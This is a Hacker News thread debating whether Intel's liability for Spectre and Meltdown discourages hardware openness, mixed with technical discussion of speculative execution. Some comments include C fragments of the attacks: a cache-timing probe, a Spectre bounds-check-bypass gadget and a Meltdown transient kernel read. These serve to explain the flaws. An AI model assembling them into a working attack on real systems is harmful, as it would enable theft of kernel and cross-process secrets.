Spectre/Meltdown Pits Transparency Against Liability (bunniestudios.com)
196 points by beardicus on Feb 1, 2018 | 87 comments



After seeing comments around the Internet on the article, one thing I wanted to add is this:

The question is not whether Intel would accept a settlement of documentation instead of money, or whether Spectre/Meltdown are bugs or not.

The question is whether /you/ would offer an exchange of documentation for release of liability. Whether or not the maker accepts the offer is orthogonal to whether you are willing to take the first step in breaking the vicious cycle that keeps hardware closed.

If you're not willing to give any allowance for the fact that sharing documentation exposes makers to more liability, then stop demanding transparency. Nobody should be obligated to put themselves in harm's way solely for your benefit or as intellectual entertainment. Likewise, learn to live with proprietary drivers, undocumented bugs, backdoors, and potential exploits hidden in your hardware, because without a transparency compromise, none of these problems will have a sustainable solution.


> The question is whether /you/ would offer an exchange of documentation for release of liability. Whether or not the maker accepts the offer is orthogonal to whether you are willing to take the first step in breaking the vicious cycle that keeps hardware closed.

As an individual, I would be more than happy to make the exchange. The pitchfork-carrying crowd that rants online? Most of them would be happy to make the exchange as well, I believe.

The important question, in my opinion, is: are their business partners willing to absolve them of any liability in exchange for transparency? I don't think it makes sense for them; I don't think it makes sense in any business.


I don't trust the companies to be held accountable in court anyway. Open it up and let the market punish those who release buggy hardware with reputation loss!


The compromise is that you don't prefer transparent competitors, or launch lawsuits against them. Events like Spectre might represent a sustainable solution if the law gives the backlash teeth.


Halfway through he notes how processors have millions of transistors, each being slightly different, and notes how we are just soooo lucky to have found a hardware bug now.

Except both Spectre and Meltdown, AFAIK (IANAHWE), are design flaws: the silicon is working as intended. The hardware is fine -- the real problem is that Intel's reputation is partially built on speed, and, now that the cladding has fallen off, we've discovered the platform was built with really flimsy supports.


> Halfway through he notes how processors have millions of transistors, each being slightly different, and notes how we are just soooo lucky to have found a hardware bug now.

I read that as the other way around. He says:

> We should all be more surprised that it took so long for a major hardware bug to be found, than the fact that one was ever found.

Which I would read as, "it's surprising we don't discover bugs in hardware more often".

I would also say that, in the world of embedded devices, HW bugs in silicon are the norm, and your chips come with some form of errata.


And it's not just embedded devices. AMD and Intel put out tons of errata too.


IDK, I think there's a way to have your cake and eat it too WRT chip level optimizations.

For instance, brushing off rings 1 and 2 from the dust bin of history could give user and kernel code ways to describe multiple levels of memory protection in a way that the chip can understand. That way, the mechanism that protected AMD from Meltdown ("I can tell from the TLB that this address is outside of what this code is supposed to touch, so I'm not going to speculate past that") could be expanded to a more general form.


I didn't know rings 1 and 2 had even been relegated to the dustbin... so everything is ring 0 now??

Which brings me to something else I don't understand about this. If mispredictions leave their calculations in cache, why can't that cached data be cleared after the branch is determined to be bad?


> I didn't know rings 1 and 2 had even been relegated to the dustbin... so everything is ring 0 now??

It's all either ring 3 (user) or ring 0 (kernel) for the purposes of this discussion. The biggest architectural impediment is the single bit for ring selection in page table entries. And since long mode requires paging, there's currently not a way to select rings 1 and 2.
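To make the "single bit" part concrete, here's a minimal sketch of the relevant x86-64 PTE flags (the macro names are mine, but the bit positions are architectural):

    #include <stdint.h>

    /* There is exactly one User/Supervisor bit (bit 2) per entry: a page
       is either supervisor-only (ring 0) or user-accessible (ring 3).
       Nothing here can express "rings 1-2 but not ring 3". */
    #define PTE_PRESENT (1ULL << 0)
    #define PTE_WRITE   (1ULL << 1)
    #define PTE_USER    (1ULL << 2)

    static int user_may_access(uint64_t pte)
    {
        return (pte & PTE_PRESENT) && (pte & PTE_USER);
    }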

Although you might be able to play with some of the hypervisor extensions to give you guest ring 0 context inside a regular user process... See Akaros for a good example of what that looks like.

> Which brings me to something else I don't understand about this. If mispredictions leave their calculations in cache, why can't that cached data be cleared after the branch is determined to be bad?

Because the cache is a fixed size, and that just kicks the can down the road. You'll just test for the eviction in your exploit instead.


> If mispredictions leave their calculations in cache, why can't that cached data be cleared after the branch is determined to be bad?

"Clearing the cached data" is just as detectable as caching the data in the first place. You'd have to treat the line fill as a transaction that could be rolled back. Unfortunately, transactional memory and CPU caches lie at polar-opposite ends of the performance spectrum.


You don't have to roll it back; you could have speculative loads store into a speculation buffer rather than directly into the cache, and then at retirement the spec-buffer entry is committed to the cache.
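As a toy software model of that idea (everything here is illustrative; cache_fill stands in for a real cache model):

    #include <stdbool.h>
    #include <stdint.h>

    #define SPEC_SLOTS 8

    struct spec_entry { uint64_t line_addr; bool valid; };
    static struct spec_entry spec_buf[SPEC_SLOTS];

    static void cache_fill(uint64_t line_addr) { (void)line_addr; }  /* stub */

    /* Load executes speculatively: fill the side buffer, not the cache. */
    static void spec_load(int slot, uint64_t line_addr)
    {
        spec_buf[slot] = (struct spec_entry){ line_addr, true };
    }

    /* Load retires: only now does the line become visible in the cache. */
    static void retire_load(int slot)
    {
        if (spec_buf[slot].valid)
            cache_fill(spec_buf[slot].line_addr);
        spec_buf[slot].valid = false;
    }

    /* Branch resolves as mispredicted: drop the entry; cache untouched. */
    static void squash_load(int slot)
    {
        spec_buf[slot].valid = false;
    }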


Perhaps, but isn't the time taken by the line fill ultimately what's leaking the information? Sure, it's probed by monitoring L1 eviction, but I'd still be nervous about the timing.

IMHO the only safe way to do a fetch from prohibited memory is to not do it at all.


No, you can't time what happens on the mis-speculated path itself. What's leaking the information is the change to the cache state which is observable after the original mis-speculated branch is resolved (by timing subsequent accesses to addresses that alias in the cache).
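Concretely, the receiving end of that channel is just a timed load. A minimal sketch for x86 with GCC/Clang; the threshold is an assumption and has to be calibrated per machine:

    #include <stdint.h>
    #include <x86intrin.h>

    #define CACHE_HIT_THRESHOLD 120  /* cycles; illustrative, calibrate per CPU */

    /* Returns 1 if the cache line holding addr was already resident,
       i.e. was touched on the mis-speculated path. */
    static int was_cached(const volatile uint8_t *addr)
    {
        unsigned int aux;
        uint64_t start = __rdtscp(&aux);
        (void)*addr;                       /* the timed load */
        uint64_t elapsed = __rdtscp(&aux) - start;
        return elapsed < CACHE_HIT_THRESHOLD;
    }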

You can also observe changes to the TLB state, though - so you'd have to do the same buffering-and-commit dance there as well.

Maybe you can also leak data through the BTB or RTB (double-Spectre!), or by tying up particular execution units conditionally, which is observable by a sibling hyperthread?


How would rings 1 and 2 help? The PTE has a supervisor bit saying that pages are mapped but not accessible to code outside ring 0. That information is cached in the TLB. Intel's problem is that it speculatively executes memory instructions before checking this bit.
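Roughly, sketching that problem in code (the names are illustrative, and a real PoC would also need fault suppression via TSX or a signal handler):

    #include <stdint.h>

    extern uint8_t probe[256 * 4096];   /* attacker-controlled user array */

    /* The first load faults because the page is supervisor-only, but on
       affected CPUs it executes speculatively before the U/S check, and
       the dependent load leaves a secret-indexed line in the cache that
       survives the fault. */
    static void transient_read(const uint8_t *kernel_addr)
    {
        uint8_t secret = *(volatile const uint8_t *)kernel_addr;
        uint8_t dummy = *(volatile uint8_t *)&probe[secret * 4096];
        (void)dummy;
    }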


Right, it totally wouldn't help current Intel processors. This is totally a future microarchitectural change. Also, there's not really a way to use rings 1 and 2 in long mode, since long mode requires paging to be enabled and the PTEs only have the one bit for ring selection.

But (given that we're talking about future chips) it could help describe protection boundaries in a finer-grained way, to protect against Spectre in the same way that AMD is protected against Meltdown.

The main issue with Spectre (in a long-term sense) is that the CPU really has no way of understanding that you're running lower-privileged code in a higher-privileged context, whether that be BPF in the kernel or JS in the browser. IMO, we're going to be fighting the same battle over and over again, as all of the mitigations so far are heavily microarchitecture-specific.


BPF in the kernel was just for the sake of expediency. The point is that the BPF code shows a somewhat common pattern that real kernel code also uses. The “real” exploit is finding a syscall that falls into that pattern somewhere.


Absolutely. There are memory-unsafety bugs that'll allow you to ROP, and probably otherwise-valid code that doesn't need unsafety that'll speculatively hit user memory in current kernels.

But in the context of trends, we're moving towards User^Kernel memory mapping with features like SMAP. That idea, combined with kernel changes to holistically enforce separation boundaries more effectively, along with cache partitioning, AFAICT leads to a potential endgame win on this front.

Edit: And to be totally up front my major side project is adding a BPF/seccomp esque virtual machine into a formally verified kernel, so my head is in that space.


Ah okay I get it.


Can you please unpack "really flimsy supports" in ELI5 language? I don't get that part of your comment -- though I was surprised I understood your "I am not a hardware engineer" (IANAHWE) fluidly...

But define "flimsy supports"


> Can you please unpack "really flimsy supports" in ELI5 language?

Modern CPUs rely upon "speculative execution" for speed, i.e. running code that they guess will be run. This usually works, but relies upon the CPU getting rid of the results of its incorrect guesses. Intel CPUs failed to do this in a very obvious way, which was recently exploited. As a result, they broke software security checks.

EDIT: Let's say your code is

    if (security_check()) {
      secure_stuff();
    } else {
      error();
    }
The Intel CPU may guess that security_check() will return true and start running secure_stuff(). When security_check() actually returns false, the CPU doesn't clean up all of the results of running secure_stuff(), so error() can spy on what would have happened if security_check() had returned true.
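For reference, this is essentially the bounds-check-bypass gadget from the Spectre paper (the array sizes and the 4096-byte stride here are illustrative):

    #include <stddef.h>
    #include <stdint.h>

    uint8_t array1[16];
    uint8_t array2[256 * 4096];

    /* If the branch is mispredicted, the CPU speculatively reads
       array1[x] out of bounds and uses the secret byte to index array2,
       leaving a cache footprint that a timing probe can recover after
       the misprediction is rolled back. */
    void victim(size_t x, size_t array1_size)
    {
        if (x < array1_size) {
            uint8_t secret = array1[x];
            (void)*(volatile uint8_t *)&array2[secret * 4096];
        }
    }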


“Results” is a loaded term. In computation, “results” means the return value of a computation. Intel does keep you from observing the result of secure_stuff. What it doesn’t do is clean up all the side effects.


Speculative execution modifies observable state. What you call it is immaterial.


The point there is that what Spectre/Meltdown exploit are side effects that are not part of the architectural state as specified by any manufacturer. The whole issue points to the fact that, security-wise, the typical approach to describing a CPU's architectural behavior is insufficient, as there can be implementation-specific observable side effects that have security ramifications.


Words have meaning. The “result” of a computation is different from its side effects. The distinction is important. Speculative execution will always modify “observable state”, e.g. power usage.


'Results' and 'side effects' are useful refinements of 'modifies observable state', and the long-overlooked fact that side effects fall into that category is an important insight. I think you would find it very difficult to explain the problem, or discuss possible solutions, without making distinctions beyond 'modifies observable state' with regard to what speculative execution does.


ELI5 is an internet acronym for "Explain like I'm five (years old)". In this example, secure_stuff() may well be a call to a function that does not return any value. Some functions are like that. But if it isn't, we can no longer be sure that the code in the else branch of the conditional won't be able to deduce what would have been returned as the result -- thanks to Intel, no thanks to Intel.

Shame on you.


Personal attacks are not allowed on HN and we ban accounts that do this. Please post civilly and substantively, or not at all.

https://news.ycombinator.com/newsguidelines.html


Intel valued speed optimizations that are inherently insecure.


ah.

Hmm.

I worked at Intel in the '90s... ran the game lab. When they came out with the Celeron, they created SIMD instructions, and they paid (bribed) game companies to optimize their games against the instruction set -- for $1MM in marketing bonuses... (i.e. "play game X on Intel's Celeron-based PCs and achieve X% performance gain")

And all of this was to prove that they could produce a <$1,000 machine that a consumer would want (the basis of the Celeron proc).


I am referring to their flawed implementation of speculative execution, with respect to how much of today's CPU performance is due to it.


> Intel's reputation is partially built on speed

Except the Spectre vulnerability isn't specific to Intel's chips.


Stanford's EE 380 had a talk on these vulnerabilities yesterday, from the Red Hat guy working on mitigations. There were some CPU designers in the audience. (Not Hennessy, though.)

The general comments were that Meltdown is a huge and easy-to-exploit vulnerability. Under Linux, any process can effectively read all of kernel RAM. There are straightforward software and hardware mitigations available. The next generation of CPUs should have it fixed.

Spectre is much harder to exploit and much tougher to fix. It's not an inevitable problem with speculative execution. IBM Z-series mainframes apparently don't have this problem. But it's going to be tough.

The real problem is all the hardware and software out there in the field vulnerable to Meltdown. There will be unpatched systems for years to come. That's what worries the Red Hat guy. They have customers wanting patches to old kernels they no longer support.


I was also there, and that was _one of the things_ that worried Jon Masters (the guy from Red Hat). In general, there seemed (to me) to be a consensus that as long as you had access to high-resolution timing (like RDTSC), and any form of speculation/prediction (even in in-order pipelines), then you could have exploits.

The recording will eventually be up at https://www.youtube.com/playlist?list=PLoROMvodv4rMWw6rRoeSp..., but I can't recommend it. Unfortunately, Mr. Masters spent most of the ~75 minutes on introductory material (a fairly common mistake at EE380). The best discussion happened in the additional hour after the official end of the talk (and of the recording).

In fact, Pro Tip to people presenting at EE380 (and, for that matter, most "Company X wants to show us Y" meetings that I've attended): Take your slide deck, and delete the first 40% of it.


In early statements, AMD was claiming its processors are immune to Meltdown but vulnerable to some variants of Spectre [1]. Has it now been determined that AMD processors are also vulnerable to the former? (or have the criteria evolved?) I can find statements going either way, but I am not sure if they are precise.

[1] https://developer.amd.com/wp-content/resources/Managing-Spec...


> The real problem is all that hardware and software out there in the field vulnerable to Meltdown. There will be unpatched systems for years to come. That's what worries the RedHat guy. They have customers wanting patches to old kernels they no longer support.

What use cases involve running new untrusted code on legacy unsupported systems?


> What use cases involve running new untrusted code on legacy unsupported systems?

Well yes, you shouldn't be doing that (particularly the 'unsupported' bit). The thinking here, I suppose, is that Meltdown makes privilege escalation straightforward once a malicious party has access to the system via another vector.

In my company, we run self-hosted physical servers (i.e. we're the only user on the systems) and debated whether to disable the page table isolation fix since we were seeing about a 30% performance hit.

The decision we took was that we would accept the performance hit since Meltdown means that any unauthorized entry into the system has a privilege escalation path since kernel memory is essentially readable by any process. (Quite an easy and quick decision, really.)


> The thinking here, I suppose, is that Meltdown makes privilege escalation straightforward once a malicious party has access to the system via another vector.

On an unpatched system, that's not likely to be hard in the first place.


The question that needs to be asked is this: were Intel subject to the same product liability laws as auto manufacturers or drug makers, would it make Meltdown, Spectre, and the ME vulnerabilities less likely? We know from other industries that product liability laws make for safer products, but we refuse to acknowledge that our CPUs are critical to safety, because we don't pay much attention to how pervasively they are used, or to the 2nd- and 3rd-order effects of flaws in the chips.

It's very possible, perhaps even likely, that Intel will profit more from the replacement of impacted chips than it will lose settling the various class-action cases it faces. It's questionable whether Intel's competition can or will grow manufacturing capacity such that Intel faces a real competitive threat.

It isn't that Intel is too big to be allowed to fail. It's that Intel is actually too big to fail, and that does not provide them the right incentives where product safety and quality are concerned, in my opinion.


There are more questions that arise from this. For example, if Intel had been more vigilant and this had led to a 10x reduction in technological progress (CPU power has increased exponentially), how many lives would have been affected or even lost because cutting-edge research that relies on supercomputers would only happen 40 years from now?

If by making CPUs more secure, self-driving moves 30 years into the future, how many lives will this affect?

There is an old joke about Bill Gates saying that if the automotive industry could move as fast as the computer industry, we would have $100 cars that do 1,000 miles to the gallon, and the GM chief answering that while those cars would exist, they would crash twice a day.


I'm very happy for self driving cars to move 30 years into the future if that means not leaving their CPUs open to known vulnerabilities.


1.25 million people die in auto-related accidents each year. That's one person every 25 seconds.

If you are willing to delay the onset of self-driving cars by 30 years, that's a lot of blood. I agree there is a balance point that's not 1.25 × 30 million: some will still die after self-driving cars are introduced. There may even be some vulnerabilities exploited (though I strongly doubt that hacks will amount to anything approaching 1.25 million people per year; the media will hype up crashes where the self-driving car or its security system was at fault as if they did, while ignoring the everyday fatal accidents that merit nothing except maybe an advisory to avoid that road on your morning commute). And as critical safety measures like maximum-speed enforcement, drunk-driving enforcement, helmets on motorcycles, seat belts, and child restraints trickle down into developing countries and older used cars, the number per year will, I hope, drop.

But one or two more have died somewhere since you started reading this comment. Still want to delay it?


Everyone dies exactly once, no matter what they do, so I question whether driving causes any deaths at all. I think the comparison needs to be put in terms of quality-adjusted person-years of life lost, or something like that. People get tunnel vision when focused on optimizing a certain metric. If nobody was driving, how much would life expectancy go up?


That only strengthens the argument.

People die from heart disease, cancer, respiratory failure, Alzheimer's, strokes etc. in old age. Reducing one of those factors would give few additional high-quality person-years of life. Auto accidents bring death to younger people who, in the absence of that catastrophe, would be expected to live many more years.


Vulnerabilities always get used. There's no way forward that doesn't include more vigilance.


This is certainly true; the difficult part is finding a middle point between vigilance and a sufficient rate of progress.

Sometimes, though, you can work in parallel. A consumer-grade CPU may, for example, be used in an airtight setup when increased security is needed.


> but we refuse to acknowledge that our CPUs are critical to safety, because we don't pay much attention to how pervasively they are used

What kind of safety are we talking about? Nuclear power plants? Airplanes? Self-driving cars? If so, why would you be running untrusted, remote code on the CPUs of the critical components?

Sure, there occasionally are CPU bugs where the CPU just randomly locks up, but we can defend against those with redundancy. The Meltdown bug, on the other hand, requires malicious activity on the same chip, i.e. you need to offer an attacker a sandbox to run code in, and then hope the sandbox holds and is properly resource-limited so it can't DoS your safety-critical system. It's a risk you shouldn't be taking in the first place.

And if we're just talking about credit card data, well, we can easily compensate by moving to dedicated instances once such a problem becomes known; it's no worse than the hypervisor escapes that become known every now and then.


There would need to be two separate products. One covered by higher liability intended for use in critical systems, and the other under the standard liability.

I imagine that the higher liability CPU would likely be slow, old, and very very expensive. But that is the compromise required on behalf of the consumer.


That's pretty much what the military and satellite operators buy. Older, simpler CPUs manufactured on larger nodes, radiation-hardened to boot and with years of proven track record and bug fixes.

And then they buy two or three per system for redundancy.


And they pay for that too. A RAD750 was about $200,000 each, according to Wikipedia.


I'd say that the hardening is the overwhelming motivator there. That's the reason to be on a huge node. If you're not worried about radiation, you could shrink the same design, making it cheaper and faster and have larger safety margins all at the same time.


What's a critical system? Is it okay for some things to have compromised security?


Safety and security are two different things that are very often at odds with each other.


It is not a question about safety, it is about security. To illustrate the difference, in an airport, safety is about properly maintaining planes and security is about keeping terrorists out.

If we exclude all potential issues except those related to Meltdown and Spectre, Intel chips are perfectly safe: the results are correct and there are no crashes. That means that if they were safe to use in critical systems like engine control units, they still are.

Meltdown and Spectre are security bugs; they are usually treated differently from safety problems like those with cars and drugs.


> The question that needs to be asked is this: were Intel subject to the same product liability laws as auto manufacturers or drug makers, would it make Meltdown, Spectre, and the ME vulnerabilities less likely?

This is such an important question -- and why we can't rely on government agencies like the FCC (Ajit Pai) to resolve these issues. These are questions that will be critical to the evolution of the digital humanity that we shall forever-more be.

So we need to evolve to a next-level meta-thought about humanity's destiny... right now we are too focused on petty thinking.

We need to solve this problem.


> The question that needs to be asked is this: were Intel subject to the same product liability laws as auto manufacturers or drug makers, would it make Meltdown, Spectre, and the ME vulnerabilities less likely?

It would certainly make modern high-performance computing less likely.


In the case of Spectre/Meltdown, it's not simply a case of finding the vulnerabilities and patching them; the workarounds carry significant performance costs and essentially mean the processors affected are now less capable than when they were sold. This incurs damages for the people whose computing is now slower / not fit for purpose, or who now have to buy more processors to meet their requirements. Openness is great, but I don't believe we should sell our guarantees for it and put ourselves in a buyer-beware situation.


Interestingly, this is very similar to the case of VW diesel engines. They were cutting corners for performance, and the cheap fix (software) incurs a performance and/or efficiency penalty of the same magnitude as the Spectre/Meltdown patches.

In that case, the outcome was significantly better for consumers in the US compared to elsewhere.

Are there any legal processes against Intel from customers?


VW intentionally misled buyers and regulators about the actual emissions of their cars. Unless Intel knew about Spectre/Meltdown when they were designing their chips, it's a pretty different situation legally speaking.


Agreed. They did sell a product that doesn't do what customers expect, though; but I assume customers weren't misled by that either, simply because Intel doesn't put performance figures on the boxes (and the theoretical performance is unchanged -- it might be different if a manufacturer were to e.g. disable half the cache or cut clocks 15% to fix an honest design mistake).


They did know. Or at least there were papers about it back in the '90s.


Bunnie's logic seems impeccable. Let's put down the pitchforks -- for vendors that disclose.

That leaves plenty of uses for pitchforks...


Well, unfortunately that doesn't help in the current US legal climate with how class action lawsuits work.

Even if we as developers put down our pitchforks, a class action firm will jump on any perceived liability.


Openness and liability seem to be largely orthogonal in practice. While I agree with the author that there would be little in the way of open-source software if its developers could be held responsible for any flaws, there is a lot of commercial, closed software that is almost as well shielded from liability. On the other hand, drugs are open in the sense that their chemical formulae are known, yet their producers carry considerable liability.

The complexity of modern processors is very similar to that of software, and this should be taken into account, but if Intel is summarily absolved, it is more likely to join Microsoft and Apple in the 'closed, limited liability' corner, rather than keeping company with Linux and GNU.


> To simply say, “but hardware manufacturers should ship perfect products because they are taking my money, and my code can be buggy because it’s free of charge” – is naïve.

With respect to Bunnie – Why? I understand that a complex piece of hardware can never be completely bug-free. But if a bug renders the product unfit for purpose, does the manufacturer not have a legal obligation to either fix the bug or provide monetary compensation? And I'm not sure I buy the argument that this obligation makes manufacturers more likely to try to hide bugs. If they sell products with defects that are known but not disclosed to the customer, are they not committing fraud?


Yeah, I agree with you. There is no relationship, and definitely not a vendor relationship, between an open source developer and someone who downloads their work and uses it in exchange for nothing.

A more sensible position seems like "let's get the bugs out fast rather than having one per architecture for the next 100 years" and making it open. But I can see that being unwise, depending on how long they think it will take and how much of a hit to their reputation it would be.


I'm not quite buying the central point of this piece.

The author argues that transparency and liability are at odds, and cites Open Source Software as the main example to justify this.

But, there is a third aspect: Money. If you sell something to me, then I want both transparency and assurances of fitness for purpose. Even if it's not directly part of the contract, it's implied by consumer protection laws. (Maybe not everywhere, but .de seems to have pretty good consumer protection).

Open Source Software doesn't come without liability just because of its openness, but also because it's free as in beer.


You can want transparency all you want, but you're not going to get it. I guarantee that, in any large for-profit software product you use, the devs know of at least one unprivileged read bug which they will not disclose.


This is called ethics! It's interesting that the idea that a Fortune 500 company could behave ethically is immediately written off -- indeed, not even discussed as a solution.


I don't think this makes much sense. Currently, Intel's chips aren't open at all. If they were open, then this article might have a point: demanding that Intel replace or fix their broken products would indeed cause issues.

But that's the point. The hardware is not open. If anything, tightening warranties for closed hardware and loosening them for open hardware would likely have the opposite effect: it would make Intel open their code (if we follow the logic of the article).


His bargain (if I’ve understood) is that they should open the software and designs, or replace physical chips.


Partially related, does anyone know if AMD support on Linux is basically on par with Intel?


For CPU support, last I checked: yes. I was able to use AMD CPUs transparently.

Now, on graphics-card support for machine learning applications, AMD falls short of Nvidia, but that's a different processor.


AMD is working hard on the open-source AMDGPU Linux drivers, and they have been working well for me. Unfortunately, AMD doesn't have parity with Nvidia's CUDA; there are nascent efforts to compete via ROCm/OpenCL, but CUDA is quite far ahead for ML applications. Sadly, upstream TF relies on CUDA and isn't showing any signs of supporting AMD GPUs.

I'm hoping the "no data center usage" clause Nvidia recently slipped into its license will encourage more people to develop for AMD GPUs, or to expend more effort on porting ML libraries and tools to them.


Also, AMD graphics card support for graphics applications is generally excellent, especially in the last few months with newer cards. AMD have released a fully open-source driver chain called AMDGPU, the only caveat being that it uses an open-source LLVM-based shader compiler toolchain that's somewhat slower on some workloads (and somewhat faster on others!) than whatever proprietary thing is in their blob drivers, which are called AMDGPU PRO.


What does the Spectre/Meltdown bug mean for a person planning to buy a new Windows 10 computer? Should I buy an AMD CPU based computer instead of an Intel based computer?


Isn't this what insurance is for?


I'd agree, although maybe it's not that simple. For insurance to work, actuaries need to be able to determine the risk with reasonable accuracy. For car crashes and medical malpractice there's a lot of statistics, for newly discovered hardware vulnerabilities, less so.


Fair enough. But the inherent complexity of a modern Intel hardware design surely puts at least a lower bound on the probability of bugs.


If there were a lower bound, then there would be no point in insuring against it. If I knew I would incur at least $1B a year in legal losses, then I'd budget for it. Insurance is for covering the upper bound.


The upper bound is just as important for working out an insurance premium...


There's a bit of an apples-to-oranges comparison going on here between open hardware and open-source software with regard to liability. The situation falls into the same trap that the RIAA/MPAA/copyright institutes fall into when trying to compare piracy against theft of goods.

Open-source software is usually provided free of charge, at the cost of the developer's time. It's also often produced by the developer as part of everyday problem solving for something else, where that something else is often a paid gig (i.e. releasing a generalized library that was used to solve a problem for an application that has paying users, or for a customer's bespoke development effort), so even in that scenario it can be seen as being produced at no charge. Once 'produced', the product can replicate itself in unlimited numbers at zero cost.

Open-source hardware comes in a few pieces: (1) the specification, which can be completely open and released without promise of warranty against defects, and which comes with that transparency; (2) the actual hardware product, which is paid for by the customer, often at a profit but not necessarily; and (3) the software behind the hardware (bootloaders and such), which should also be free. There are costs involved in hardware production and purchase that do not exist in the software world.[0]

Of these things, most consumers would expect the second to come with a warranty of some kind against defects, and it would be an intelligent thing for a company -- even one operating as a non-profit -- to mark up the product enough to offer a suitable and clear warranty. In the case of Intel, a very for-profit entity that keeps its specification, documentation, and flaws under lock and key for the protection of its business and, quite rightly, aims to sell its product in a manner that maximises profits for its shareholders, all consumers expect a product that is going to be warranty-protected.

Where this gets tricky is in explaining Spectre/Meltdown to the average non-technical person.[1] It's plausible that Intel couldn't have noticed this flaw even if they were employing every possible method to ensure the protection and safety of their customers.[2] The complexities around this issue are very high, and the company can reasonably be forgiven for missing the problem. But most consumers won't understand this -- what they will understand is that shortly after receiving the mitigation against the flaw, their shiny new processor got a whole lot slower, or their PC stopped booting. They'll blame Microsoft, who will in turn point the finger at Intel, and they'll join whatever class-action lawsuit fits most appropriately for them.

Personally, I don't see how they avoid a large recall effort similar to the one that happened with early Pentium models in the '90s, which had a flaw that led to calculations being incorrect -- a flaw that could be worked around in software as well, but that was clearly a hardware flaw.

Will the same thing happen to an open-source chip with a hardware flaw? Probably, yes. Will it be targeted at the company that produces the chip or at the group that produces the specification? If the two are not one and the same, it'll probably be the responsibility of the chip producer to handle the warranty claims, and it might result in a hardware recall of sorts, unless the issue is one of software running on the chip that can be patched. The difference is that open hardware might spot the problem before production, and even if not, the problem will have many more eyes on it for providing solutions.

[0] See paragraph 1. I'm not saying software production is free of costs; but unlike hardware production, it's possible for software production to be completely free of costs.

[1] Hell, it's difficult explaining it to industry insiders.

[2] Something which, given the debacle around the Intel ME, is very debatable.


At this point, the only people that should be worrying about Spectre/Meltdown are cloud hosting providers. For individual users, Spectre/Meltdown attacks rely on malware processes running on your computer, and if that is happening, you have bigger problems to worry about.


Is some piece of JavaScript loaded in your browser one of those "bigger problems to worry about"? What about some Windows tool I download to help me run games in borderless fullscreen? What about videogame mods? And here I was hoping that running everything as a regular/non-admin user was sufficiently secure...

People say "you need to have malware running on your system" as if it's not normal to run other people's code on a desktop system, but it's actually very, very common, which is why privilege separation and user sandboxing are done in modern operating systems. JavaScript has been shown to successfully exploit at least one of these bugs.


JavaScript Spectre/Meltdown attacks are already effectively defeated through browser updates that reduce timer accuracy.


> Is some piece of JavaScript loaded in your browser one of those "bigger problems to worry about"?

As soon as I hear of such an exploit in the wild, I'll panic. The demonstrations so far have consisted of arcane research papers and canned videos.

Send me a link to a PoC page that returns stored passwords, harvests cryptocurrency wallets, drops payloads, or otherwise screws with my unpatched system. Until then, I think people are grossly exaggerating how big a deal the Spectre/Meltdown exploits are.


JavaScript code running in a properly sandboxed modern browser can potentially exploit these vulnerabilities.



